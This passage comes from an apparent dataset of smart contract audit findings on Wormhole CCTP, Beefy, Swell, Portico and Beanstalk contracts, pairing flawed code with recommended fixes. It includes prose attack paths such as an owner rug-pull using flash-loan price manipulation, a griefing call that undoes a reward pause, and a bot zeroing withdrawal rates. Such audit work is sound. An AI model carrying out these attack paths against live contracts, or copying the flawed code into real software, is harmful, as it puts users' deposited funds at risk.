Therefore, regardless of the `length` of the original bytes, the output slice will always have a size defined by the `length` parameter.\\nIt is understood that this is known behavior due to the unchecked nature of this function and the accompanying checked version, which performs validation on the `nextOffset` return value compared with the length of the encoded bytes.\\n```\\nfunction slice(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n (ret, nextOffset) = sliceUnchecked(encoded, offset, length);\\n checkBound(nextOffset, encoded.length);\\n}\\n```\\n\\nIt has not been possible within the constraints of this review to identify a valid scenario in which malicious calldata can make use of this behavior to launch a successful exploit; however, this is not a guarantee that the usage of this library function is bug-free since there do exist certain quirks related to the loading of calldata.","Consider bailing early if the length of the bytes from which to construct a slice is zero, and always ensure the resultant offset is correctly validated against the length when using the unchecked version of the function.","The impact is limited in the context of the library function's usage in the scope of this review; however, it is advisable to check any other usage elsewhere and in the future to ensure that this behavior cannot be weaponized. `BytesParsing::sliceUnchecked` is currently only used in `WormholeCctpMessages::_decodeBytes`, which itself is called in `WormholeCctpMessages::decodeDeposit`. 
This latter function is utilized in two places:","```\\nfunction sliceUnchecked(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n //bail early for degenerate case\\n if (length == 0) {\\n return (new bytes(0), offset);\\n }\\n\\n assembly (""memory-safe"") {\\n nextOffset := add(offset, length)\\n ret := mload(freeMemoryPtr)\\n\\n /* snip: inline dev comments */\\n\\n let shift := and(length, 31) //equivalent to `mod(length, 32)` but 2 gas cheaper\\n if iszero(shift) { shift := wordSize }\\n\\n let dest := add(ret, shift)\\n let end := add(dest, length)\\n for { let src := add(add(encoded, shift), offset) } lt(dest, end) {\\n src := add(src, wordSize)\\n dest := add(dest, wordSize)\\n } { mstore(dest, mload(src)) }\\n\\n mstore(ret, length)\\n //When compiling with --via-ir then normally allocated memory (i.e. via new) will have 32 byte\\n // memory alignment and so we enforce the same memory alignment here.\\n mstore(freeMemoryPtr, and(add(dest, 31), not(31)))\\n }\\n}\\n```\\n" +A given CCTP domain can be registered for multiple foreign chains due to insufficient validation in `Governance::registerEmitterAndDomain`,low,"`Governance::registerEmitterAndDomain` is a Governance action that is used to register the emitter address and corresponding CCTP domain for a given foreign chain. Validation is currently performed to ensure that the registered CCTP domain of the foreign chain is not equal to that of the local chain; however, there is no such check to ensure that the given CCTP domain has not already been registered for a different foreign chain. In this case, where the CCTP domain of an existing foreign chain is mistakenly used in the registration of a new foreign chain, the `getDomainToChain` mapping of an existing CCTP domain will be overwritten to the most recently registered foreign chain. 
Given the validation that prevents foreign chains from being registered again, without a method for updating an already registered emitter, it will not be possible to correct this corruption of state.\\n```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // For now, ensure that we cannot register the same foreign chain again.\\n require(registeredEmitters[foreignChain] == 0, ""chain already registered"");\\n\\n /* snip: additional parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n","Consider adding the following validation when registering a CCTP domain for a foreign chain:\\n```\\n// Add the line below\\n require (getDomainToChain()[cctpDomain] == 0, ""CCTP domain already registered for a different foreign chain"");\\n```\\n","The impact of this issue in the current scope is limited since the corrupted state is only ever queried in a public view function; however, if it is important for third-party integrators, then this has the potential to cause downstream issues.\\nProof of Concept:\\nCCTP Domain A is registered for foreign chain identifier X.\\nCCTP Domain A is again registered, this time for foreign chain identifier Y.\\nThe `getDomainToChain` mapping for CCTP Domain A now points to foreign chain identifier Y, while the `getChainToDomain` mapping for both X and Y now points to CCTP domain A.","```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // For now, ensure that we cannot register the same foreign chain again.\\n require(registeredEmitters[foreignChain] == 0, ""chain already registered"");\\n\\n /* snip: additional parsing of 
Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n" +Lack of Governance action to update registered emitters,low,"The Wormhole CCTP integration contract currently exposes a function `Governance::registerEmitterAndDomain` to register an emitter address and its corresponding CCTP domain on the given foreign chain; however, no such function currently exists to update this state. Any mistake made when registering the emitter and CCTP domain is irreversible unless an upgrade is performed on the entirety of the integration contract itself. Deployment of protocol upgrades comes with its own risks and should not be performed as a necessary fix for trivial human errors. Having a separate governance action to update the emitter address, foreign chain identifier, and CCTP domain is a preferable pre-emptive measure against any potential human errors.\\n```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n",The addition of a `Governance::updateEmitterAndDomain` function is recommended to allow Governance to more easily respond to any issues with the registered emitter state.,"In the event an emitter is registered with an incorrect foreign chain identifier or CCTP domain, then a protocol upgrade will be required to mitigate this issue. 
As such, the risks associated with the deployment of protocol upgrades and the potential time-sensitive nature of this issue warrant a low severity rating.\\nProof of Concept:\\nA Governance VAA erroneously registers an emitter with the incorrect foreign chain identifier.\\nA Governance upgrade is now required to re-initialize this state so that the correct foreign chain identifier can be associated with the given emitter address.",```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n +Temporary denial-of-service when in-flight messages are not executed before a deprecated Wormhole Guardian set expires,low,"Wormhole exposes a governance action in `Governance::submitNewGuardianSet` to update the Guardian set via Governance VAA.\\n```\\nfunction submitNewGuardianSet(bytes memory _vm) public {\\n // rest of code\\n\\n // Trigger a time-based expiry of current guardianSet\\n expireGuardianSet(getCurrentGuardianSetIndex());\\n\\n // Add the new guardianSet to guardianSets\\n storeGuardianSet(upgrade.newGuardianSet, upgrade.newGuardianSetIndex);\\n\\n // Makes the new guardianSet effective\\n updateGuardianSetIndex(upgrade.newGuardianSetIndex);\\n}\\n```\\n\\nWhen this function is called, `Setters::expireGuardianSet` initiates a 24-hour timeframe after which the current guardian set expires.\\n```\\nfunction expireGuardianSet(uint32 index) internal {\\n _state.guardianSets[index].expirationTime = uint32(block.timestamp) + 86400;\\n}\\n```\\n\\nHence, any in-flight VAAs that utilize the deprecated Guardian set index will fail to be executed given the validation present in `Messages::verifyVMInternal`.\\n```\\n/// @dev 
Checks if VM guardian set index matches the current index (unless the current set is expired).\\nif(vm.guardianSetIndex != getCurrentGuardianSetIndex() && guardianSet.expirationTime < block.timestamp){\\n return (false, ""guardian set has expired"");\\n}\\n```\\n\\nConsidering there is no automatic relaying of Wormhole CCTP messages, counter to what is specified in the documentation (unless an integrator implements their own relayer), there are no guarantees that an in-flight message which utilizes an old Guardian set index will be executed by the `mintRecipient` on the target domain within its 24-hour expiration period. This could occur, for example, in cases such as:\\nIntegrator messages are blocked by their use of the Wormhole nonce/sequence number.\\nCCTP contracts are paused on the target domain, causing all redemptions to revert.\\nL2 sequencer downtime, since the Wormhole CCTP integration contracts do not consider aliased addresses for forced inclusion.\\nThe `mintRecipient` is a contract that has been paused following an exploit, temporarily restricting all incoming and outgoing transfers.\\nIn the current design, it is not possible to update the `mintRecipient` for a given deposit due to the multicast nature of VAAs. 
CCTP exposes `MessageTransmitter::replaceMessage` which allows the original source caller to update the destination caller for a given message and its corresponding attestation; however, the Wormhole CCTP integration currently provides no access to this function and has no similar functionality of its own to allow updates to the target `mintRecipient` of the VAA.\\nAdditionally, there is no method for forcibly executing the redemption of USDC/EURC to the `mintRecipient`, which is the only address allowed to execute the VAA on the target domain, as validated in `Logic::redeemTokensWithPayload`.\\n```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, ""caller must be mintRecipient""\\n);\\n```\\n\\nWithout any programmatic method for replacing expired VAAs with new VAAs signed by the updated Guardian set, the source USDC/EURC will be burnt, but it will not be possible for the expired VAAs to be executed, leading to denial-of-service on the `mintRecipient` receiving tokens on the target domain. The Wormhole CCTP integration does, however, inherit some mitigations already in place for this type of scenario where the Guardian set is updated, as explained in the Wormhole whitepaper, meaning that it is possible to repair or otherwise replace the expired VAA for execution using signatures from the new Guardian set. In all cases, the original VAA metadata remains intact since the new VAA Guardian signatures refer to an event that has already been emitted, so none of the contents of the VAA payload besides the Guardian set index and associated signatures change on re-observation. 
This means that the new VAA can be safely paired with the existing Circle attestation for execution on the target domain by the original `mintRecipient`.","The practicality of executing the proposed Governance mitigations at scale should be carefully considered, given the extent to which USDC is entrenched within the wider DeFi ecosystem. There is a high likelihood of temporary widespread, high-impact DoS, although this is somewhat limited by the understanding that Guardian set updates are expected to occur relatively infrequently, given there have only been three updates in the lifetime of Wormhole so far. There is also potentially insufficient tooling for the detailed VAA re-observation scenarios, which should handle the recombination of the signed CCTP message with the new VAA and clearly communicate these considerations to integrators.","There is only a single address that is permitted to execute a given VAA on the target domain; however, there are several scenarios that have been identified where this `mintRecipient` may be unable to perform redemption for a period in excess of 24 hours following an update to the Guardian set while the VAA is in-flight. 
Fortunately, Wormhole Governance has a well-defined path to resolution, so the impact is limited.\\nProof of Concept:\\nAlice burns 100 USDC to be transferred to dApp X from CCTP Domain A to CCTP Domain B.\\nWormhole executes a Governance VAA to update the Guardian set.\\n24 hours pass, causing the previous Guardian set to expire.\\ndApp X attempts to redeem 100 USDC on CCTP Domain B, but VAA verification fails because the message was signed using the expired Guardian set.\\nThe 100 USDC remains burnt and cannot be minted on the target domain by executing the attested CCTP message until the expired VAA is reobserved by members of the new Guardian set.","```\\nfunction submitNewGuardianSet(bytes memory _vm) public {\\n // rest of code\\n\\n // Trigger a time-based expiry of current guardianSet\\n expireGuardianSet(getCurrentGuardianSetIndex());\\n\\n // Add the new guardianSet to guardianSets\\n storeGuardianSet(upgrade.newGuardianSet, upgrade.newGuardianSetIndex);\\n\\n // Makes the new guardianSet effective\\n updateGuardianSetIndex(upgrade.newGuardianSetIndex);\\n}\\n```\\n" +`StrategyPassiveManagerUniswap` gives ERC20 token allowances to `unirouter` but doesn't remove allowances when `unirouter` is updated,medium,"`StrategyPassiveManagerUniswap` gives ERC20 token allowances to unirouter:\\n```\\nfunction _giveAllowances() private {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, type(uint256).max);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, type(uint256).max);\\n}\\n```\\n\\n`unirouter` is inherited from `StratFeeManagerInitializable` which has an external function `setUnirouter` which allows `unirouter` to be changed:\\n```\\n function setUnirouter(address _unirouter) external onlyOwner {\\n unirouter = _unirouter;\\n emit SetUnirouter(_unirouter);\\n}\\n```\\n\\nThe allowances can only be removed by calling `StrategyPassiveManagerUniswap::panic` however `unirouter` can be changed any time via the `setUnirouter` function.\\nThis allows the contract 
to enter a state where `unirouter` is updated via `setUnirouter` but the ERC20 token approvals given to the old `unirouter` are not removed.",1) Make `StratFeeManagerInitializable::setUnirouter` `virtual` such that it can be overridden by child contracts. 2) `StrategyPassiveManagerUniswap` should override `setUnirouter` to remove all allowances before calling the parent function to update `unirouter`.,The old `unirouter` contract will continue to have ERC20 token approvals for `StratFeeManagerInitializable` so it can continue to spend the protocol's tokens when this is not the protocol's intention as the protocol has changed `unirouter`.,"```\\nfunction _giveAllowances() private {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, type(uint256).max);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, type(uint256).max);\\n}\\n```\\n" +Owner of `StrategyPassiveManagerUniswap` can rug-pull users' deposited tokens by manipulating `onlyCalmPeriods` parameters,low,"While `StrategyPassiveManagerUniswap` does have some permissioned roles, one of the attack paths we were asked to check was that the permissioned roles could not rug-pull the users' deposited tokens. There is a way that the owner of the `StrategyPassiveManagerUniswap` contract could accomplish this by modifying key parameters to reduce the effectiveness of the `_onlyCalmPeriods` check. 
This appears to be how a similar protocol Gamma was exploited.\\nProof of Concept:\\nOwner calls `StrategyPassiveManagerUniswap::setDeviation` to increase the maximum allowed deviations to large numbers or alternatively `setTwapInterval` to decrease the twap interval rendering it ineffective\\nOwner takes a flash loan and uses it to manipulate `pool.slot0` to a high value\\nOwner calls `BeefyVaultConcLiq::deposit` to perform a deposit; the shares are calculated thus:\\n```\\n// @audit `price` is derived from `pool.slot0`\\nshares = _amount1 + (_amount0 * price / PRECISION);\\n```\\n\\nAs `price` is derived from `pool.slot0` which has been inflated, the owner will receive many more shares than they normally would\\nOwner unwinds the flash loan returning `pool.slot0` back to its normal value\\nOwner calls `BeefyVaultConcLiq::withdraw` to receive many more tokens than they should be able to due to the inflated share count they received from the deposit",Beefy already intends to have all owner functions behind a timelocked multi-sig and if these transactions are attempted the suspicious parameters would be an obvious signal that a future attack is coming. Because of this the probability of this attack being effectively executed is low though it is still possible.\\nOne way to further mitigate this attack would be to have a minimum required twap interval and maximum required deviation amounts such that the owner couldn't change these parameters to values which would enable this attack.,Owner of `StrategyPassiveManagerUniswap` can rug-pull users' deposited tokens.,```\\n// @audit `price` is derived from `pool.slot0`\\nshares = _amount1 + (_amount0 * price / PRECISION);\\n```\\n +"`_onlyCalmPeriods` does not consider MIN/MAX ticks, which can DOS deposit, withdraw and harvest in edge cases",low,"In Uniswap V3 liquidity providers can only provide liquidity between price ranges `[1.0001^{MIN_ TICK};1.0001^{MAX_TICK})`. 
Therefore these are the min and max prices.\\n```\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n if(\\n twapTick - maxTickDeviationNegative > tick ||\\n twapTick + maxTickDeviationPositive < tick) revert NotCalm();\\n }\\n```\\n\\nIf `twapTick - maxTickDeviationNegative < MIN_TICK`, this function would revert even if `tick` has been the same for years. This can DOS deposits, withdrawals and harvests when they should be allowed for as long as the state holds.","Consider changing the current implementation to:\\n```\\n// Add the line below\\n const int56 MIN_TICK = // Remove the line below\\n887272;\\n// Add the line below\\n const int56 MAX_TICK = 887272;\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n// Add the line below\\n int56 minCalmTick = max(twapTick // Remove the line below\\n maxTickDeviationNegative, MIN_TICK);\\n// Add the line below\\n int56 maxCalmTick = min(twapTick // Remove the line below\\n maxTickDeviationPositive, MAX_TICK);\\n\\n if(\\n// Remove the line below\\n twapTick // Remove the line below\\n maxTickDeviationNegative > tick ||\\n// Remove the line below\\n twapTick // Add the line below\\n maxTickDeviationPositive < tick) revert NotCalm();\\n// Add the line below\\n minCalmTick > tick ||\\n// Add the line below\\n maxCalmTick < tick) revert NotCalm();\\n }\\n```\\n",,```\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n if(\\n twapTick - maxTickDeviationNegative > tick ||\\n twapTick + maxTickDeviationPositive < tick) revert NotCalm();\\n }\\n```\\n +Withdraw can return zero tokens while burning a positive amount of shares,low,Invariant fuzzing found an edge-case where a user could burn an amount of shares > 0 but receive zero output tokens. 
The cause appears to be a rounding down to zero precision loss for small `_shares` value in `BeefyVaultConcLiq::withdraw` L220-221:\\n```\\nuint256 _amount0 = (_bal0 * _shares) / _totalSupply;\\nuint256 _amount1 = (_bal1 * _shares) / _totalSupply;\\n```\\n,Change the slippage check to also revert if no output tokens are returned:\\n```\\nif (_amount0 < _minAmount0 || _amount1 < _minAmount1 ||\\n (_amount0 == 0 && _amount1 == 0)) revert TooMuchSlippage();\\n```\\n,Protocol can enter a state where a user burns their shares but receives zero output tokens in return.\\nProof of Concept: Invariant fuzz testing suite supplied at the conclusion of the audit.,```\\nuint256 _amount0 = (_bal0 * _shares) / _totalSupply;\\nuint256 _amount1 = (_bal1 * _shares) / _totalSupply;\\n```\\n +`SwellLib.BOT` can subtly rug-pull withdrawals by setting `_processedRate = 0` when calling `swEXIT::processWithdrawals`,medium,"When users create a withdrawal request, their `swETH` is burned then the current exchange rate `rateWhenCreated` is fetched from swETH::swETHToETHRate:\\n```\\nuint256 rateWhenCreated = AccessControlManager.swETH().swETHToETHRate();\\n```\\n\\nHowever `SwellLib.BOT` can pass an arbitrary value for `_processedRate` when calling swEXIT::processWithdrawals:\\n```\\nfunction processWithdrawals(\\n uint256 _lastTokenIdToProcess,\\n uint256 _processedRate\\n) external override checkRole(SwellLib.BOT) {\\n```\\n\\nThe final rate used is the lesser of `rateWhenCreated` and _processedRate:\\n```\\nuint256 finalRate = _processedRate > rateWhenCreated\\n ? 
rateWhenCreated\\n : _processedRate;\\n```\\n\\nThis final rate is multiplied by the requested withdrawal amount to determine the actual amount sent to the user requesting a withdrawal:\\n```\\nuint256 requestExitedETH = wrap(amount).mul(wrap(finalRate)).unwrap();\\n```\\n\\nHence `SwellLib.BOT` can subtly rug-pull all withdrawals by setting `_processedRate = 0` when calling `swEXIT::processWithdrawals`.",Two possible mitigations:\\nChange `swEXIT::processWithdrawals` to always fetch the current rate from `swETH::swETHToETHRate`\\nOnly allow `swEXIT::processWithdrawals` to be called by the `RepricingOracle` contract which calls it correctly.,,```\\nuint256 rateWhenCreated = AccessControlManager.swETH().swETHToETHRate();\\n```\\n +Check for staleness of data when fetching Proof of Reserves via Chainlink `Swell ETH PoR` Oracle,low,"`RepricingOracle::_assertRepricingSnapshotValidity` uses the `Swell ETH PoR` Chainlink Proof Of Reserves Oracle to fetch an off-chain data source for Swell's current reserves.\\nThe Oracle `Swell ETH PoR` is listed on Chainlink's website as having a heartbeat of `86400` seconds (check the ""Show More Details"" box in the top-right corner of the table), however no staleness check is implemented by RepricingOracle:\\n```\\n// @audit no staleness check\\n(, int256 externallyReportedV3Balance, , , ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n```\\n","Implement a staleness check and if the Oracle is stale, either revert or skip using it as the code currently does if the oracle is not set.\\nFor multi-chain deployments ensure that a correct staleness check is used for each feed as the same feed can have different heartbeats on different chains.\\nConsider adding an off-chain bot that periodically checks if the Oracle has become stale and if it has, raises an internal alert for the team to investigate.","If the `Swell ETH PoR` Chainlink Proof Of Reserves Oracle has stopped functioning correctly, 
`RepricingOracle::_assertRepricingSnapshotValidity` will continue processing with stale reserve data as if it were fresh.","```\\n// @audit no staleness check\\n(, int256 externallyReportedV3Balance, , , ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n```\\n" +Precision loss in `swETH::_deposit` from unnecessary hidden division before multiplication,low,`swETH::_deposit` L170 contains a hidden unnecessary division before multiplication as the call to `_ethToSwETHRate` performs a division which then gets multiplied by msg.value:\\n```\\nuint256 swETHAmount = wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// @audit expanding this out\\n// wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// wrap(msg.value).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap();\\n```\\n\\nThis issue has not been introduced in the new changes but is in the mainnet code.,Refactor to perform multiplication before division:\\n```\\nuint256 swETHAmount = wrap(msg.value).mul(wrap(1 ether)).div(_swETHToETHRate()).unwrap();\\n```\\n,"Slightly less `swETH` will be minted to depositors. 
While the amount by which individual depositors are short-changed is individually small, the effect is cumulative and increases as depositors and deposit size increase.\\nProof of Concept: This stand-alone stateless fuzz test can be run inside Foundry to prove this as well as provided hard-coded test cases:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.23;\\n\\nimport {UD60x18, wrap} from ""@prb/math/src/UD60x18.sol"";\\n\\nimport ""forge-std/Test.sol"";\\n\\n// run from base project directory with:\\n// (fuzz test) forge test --match-test FuzzMint -vvv\\n// (hardcoded) forge test --match-test HardcodedMint -vvv\\ncontract MintTest is Test {\\n\\n uint256 private constant SWETH_ETH_RATE = 1050754209601187151; //as of 2024-02-15\\n\\n function _mintOriginal(uint256 inputAmount) private pure returns(uint256) {\\n // hidden division before multiplication\\n // wrap(inputAmount).mul(_ethToSwETHRate()).unwrap();\\n // wrap(inputAmount).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap()\\n\\n return wrap(inputAmount).mul(wrap(1 ether).div(wrap(SWETH_ETH_RATE))).unwrap();\\n }\\n\\n function _mintFixed(uint256 inputAmount) private pure returns(uint256) {\\n // refactor to perform multiplication before division\\n // wrap(inputAmount).mul(wrap(1 ether)).div(_swETHToETHRate()).unwrap();\\n\\n return wrap(inputAmount).mul(wrap(1 ether)).div(wrap(SWETH_ETH_RATE)).unwrap();\\n }\\n\\n function test_FuzzMint(uint256 inputAmount) public pure {\\n uint256 resultOriginal = _mintOriginal(inputAmount);\\n uint256 resultFixed = _mintFixed(inputAmount);\\n\\n assert(resultOriginal == resultFixed);\\n }\\n\\n function test_HardcodedMint() public {\\n // found by fuzzer\\n console.log(_mintFixed(3656923177187149889) - _mintOriginal(3656923177187149889)); // 1\\n\\n // 100 eth\\n console.log(_mintFixed(100 ether) - _mintOriginal(100 ether)); // 21\\n\\n // 1000 eth\\n console.log(_mintFixed(1000 ether) - _mintOriginal(1000 ether)); // 215\\n\\n // 10000 eth\\n 
console.log(_mintFixed(10000 ether) - _mintOriginal(10000 ether)); // 2159\\n }\\n}\\n```\\n",```\\nuint256 swETHAmount = wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// @audit expanding this out\\n// wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// wrap(msg.value).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap();\\n```\\n +Attacker can abuse `RewardsDistributor::triggerRoot` to block reward claims and unpause a paused state,medium,"Consider the code of RewardsDistributor::triggerRoot:\\n```\\n function triggerRoot() external {\\n bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n }\\n```\\n\\nThis function:\\ncan be called by anyone\\nif it succeeds, sets `root.value` to `rootCandidateA.value` and `root.lastUpdatedAt` to `block.timestamp`\\ndoesn't reset `rootCandidateA` or `rootCandidateB`, so it can be called over and over again to continually update `root.lastUpdatedAt` or to set `root.value` to `rootCandidateA.value`.",Two possible options:\\nMake `RewardsDistributor::triggerRoot` a permissioned function such that an attacker can't call it\\nChange `RewardsDistributor::triggerRoot` to reset `rootCandidateA.value = zeroRoot` such that it can't be successfully called repeatedly.,"An attacker can abuse this function in 2 ways:\\nby calling it repeatedly an attacker can continually increase `root.lastUpdatedAt` to trigger the claim delay revert in `RewardsDistributor::claimAll` effectively blocking reward claims\\nby calling it after reward claims have been paused, an attacker can effectively unpause the paused state since `root.value` is over-written with the valid value from `rootCandidateA.value` and claim pausing works by setting `root.value == zeroRoot`.","```\\n function triggerRoot() external 
{\\n bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n }\\n```\\n" +`RewardsDistributor` doesn't correctly handle deposits of fee-on-transfer incentive tokens,medium,"`the kenneth` stated in telegram that Fee-On-Transfer tokens are fine to use as incentive tokens with `RewardsDistributor`, however when receiving Fee-On-Transfer tokens and storing the reward amount the accounting does not account for the fee deducted from the transfer amount in-transit, for example:\\n```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n IERC20(reward.token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n\\n // @audit stored `amount` here will be incorrect since it doesn't account for\\n // the actual amount received after the transfer fee was deducted in-transit\\n _storeReward(periodReceived, reward, amount);\\n}\\n```\\n","In `RewardsDistributor::_depositLPIncentive` & depositVoteIncentive:\\nread the `before` transfer token balance of `RewardsDistributor` contract\\nperform the token transfer\\nread the `after` transfer token balance of `RewardsDistributor` contract\\ncalculate the difference between the `after` and `before` balances to get the true amount that was received by the `RewardsDistributor` contract accounting for the fee that was deducted in-transit\\nuse the true received amount to generate events and write the received incentive token amounts to `RewardsDistributor::periodRewards`.\\nAlso note that `RewardsDistributor::periodRewards` is never read in the contract, only written to. 
If it is not used by off-chain processing then consider removing it.",The actual reward calculation is done off-chain and is outside the audit scope nor do we have visibility of that code. But events emitted by `RewardsDistributor` and the stored incentive token deposits in `RewardsDistributor::periodRewards` use incorrect amounts for Fee-On-Transfer incentive token deposits.,"```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n IERC20(reward.token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n\\n // @audit stored `amount` here will be incorrect since it doesn't account for\\n // the actual amount received after the transfer fee was deducted in-transit\\n _storeReward(periodReceived, reward, amount);\\n}\\n```\\n" +Use low level `call()` to prevent gas griefing attacks when returned data not required,low,"Using `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. 
For example:\\n```\\n(bool sent, ) = _to.call{value: _amount}("""");\\nrequire(sent);\\n```\\n\\nIs the same as writing:\\n```\\n(bool sent, bytes memory data) = _to.call{value: _amount}("""");\\nrequire(sent);\\n```\\n\\nIn both cases the returned data will be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not used at all.","Use a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), _to, _amount, 0, 0, 0, 0)\\n}\\nif (!sent) revert FailedToSendEther();\\n```\\n",Contract unnecessarily exposed to gas griefing attacks.,"```\\n(bool sent, ) = _to.call{value: _amount}("""");\\nrequire(sent);\\n```\\n" +No precision scaling or minimum received amount check when subtracting `relayerFeeAmount` can revert due to underflow or return less tokens to user than specified,medium,"`PorticoFinish::payOut` L376 attempts to subtract the `relayerFeeAmount` from the final post-bridge and post-swap token balance:\\n```\\nfinalUserAmount = finalToken.balanceOf(address(this)) - relayerFeeAmount;\\n```\\n\\nThere is no precision scaling to ensure that PorticoFinish's token contract balance and `relayerFeeAmount` are in the same decimal precision; if the `relayerFeeAmount` has 18 decimal places but the token is USDC with only 6 decimal places, this can easily revert due to underflow resulting in the bridged tokens being stuck.\\nAn excessively high `relayerFeeAmount` could also significantly reduce the amount of post-bridge and post-swap tokens received as there is no check on the minimum amount of tokens the user will receive after deducting `relayerFeeAmount`. 
This current configuration is an example of the ""MinTokensOut For Intermediate, Not Final Amount"" vulnerability class; as the minimum received tokens check is before the deduction of `relayerFeeAmount` a user will always receive less tokens than their specified minimum if `relayerFeeAmount > 0`.","Ensure that token balance and `relayerFeeAmount` have the same decimal precision before combining them. Alternatively check for underflow and don't charge a fee if this would be the case. Consider enforcing the user-specified minimum output token check again when deducting `relayerFeeAmount`, and if this would fail then decrease `relayerFeeAmount` such that the user at least receives their minimum specified token amount.\\nAnother option is to check that even if it doesn't underflow, that the remaining amount after subtracting `relayerFeeAmount` is a high percentage of the bridged amount; this would prevent a scenario where `relayerFeeAmount` takes a large part of the bridged amount, effectively capping `relayerFeeAmount` to a tiny % of the post-bridge and post-swap funds. This scenario can still result in the user receiving less tokens than their specified minimum however.\\nFrom the point of view of the smart contract, it should protect itself against the possibility of the token amount and `relayerFeeAmount` being in different decimals or that `relayerFeeAmount` would be too high, similar to how for example L376 inside `payOut` doesn't trust the bridge reported amount and checks the actual token balance.",Bridged tokens stuck or user receives less tokens than their specified minimum.,```\\nfinalUserAmount = finalToken.balanceOf(address(this)) - relayerFeeAmount;\\n```\\n +Use low level `call()` to prevent gas griefing attacks when returned data not required,low,"Using `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. 
For example:\\n```\\n(bool sentToUser, ) = recipient.call{ value: finalUserAmount }("""");\\nrequire(sentToUser, ""Failed to send Ether"");\\n```\\n\\nIs the same as writing:\\n```\\n(bool sentToUser, bytes memory data) = recipient.call{ value: finalUserAmount }("""");\\nrequire(sentToUser, ""Failed to send Ether"");\\n```\\n\\nIn both cases the returned data will be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not used at all.","Use a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), recipient, finalUserAmount, 0, 0, 0, 0)\\n}\\nif (!sent) revert Unauthorized();\\n```\\n\\nConsider using ExcessivelySafeCall.",Contract unnecessarily exposed to gas griefing attacks.,"```\\n(bool sentToUser, ) = recipient.call{ value: finalUserAmount }("""");\\nrequire(sentToUser, ""Failed to send Ether"");\\n```\\n" +The previous milestone stem should be scaled for use with the new gauge point system which uses untruncated values moving forward,high,"Within the Beanstalk Silo, the milestone stem for a given token is the cumulative amount of grown stalk per BDV for this token at the last `stalkEarnedPerSeason` update. Previously, the milestone stem was stored in its truncated representation; however, the seed gauge system now stores the value in its untruncated form due to the new granularity of grown stalk and the frequency with which these values are updated.\\nAt the time of upgrade, the previous (truncated) milestone stem for each token should be scaled for use with the gauge point system by multiplying up by a factor of `1e6`. 
